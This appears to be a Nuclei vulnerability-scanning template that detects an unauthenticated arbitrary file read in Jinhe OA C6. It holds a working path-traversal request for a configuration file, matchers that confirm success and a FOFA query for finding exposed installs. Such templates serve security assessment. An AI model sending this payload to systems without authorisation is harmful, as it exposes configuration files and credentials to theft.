id: jinhe-oa-c6-upload-lfi info: name: Jinhe OA_C6_UploadFileDownLoadnew - Arbitrary File Read author: pussycat0x severity: high description: | There is an arbitrary file reading vulnerability in the UploadFileDownLoadnew.aspx interface of Jinhe OA C6. An unauthenticated attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be in Extremely unsafe state. reference: - https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA_C6_UploadFileDownLoadnew%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 verified: true fofa-query: body="JHSoft.Web.AddMenu" || app="金和网络-金和OA" tags: jinhe-oa-c6,misconfig http: - method: GET path: - "{{BaseURL}}/c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini" matchers-condition: and matchers: - type: word part: body words: - "MaxFolderTotal=1" - "[JHFile]" - "FolderTotal=1" condition: and - type: status status: - 200 # digest: 4a0a004730450220113a253a49c9efc3ebbebb7f0f7a09f5ba9591d84421330e3237cc10aaf6f542022100ec45d703a8881402fc70b28229eab7688c3b5fa5fc9e36c43b6f97dd7ecb1faf:922c64590222798bb761d5b6d8e72950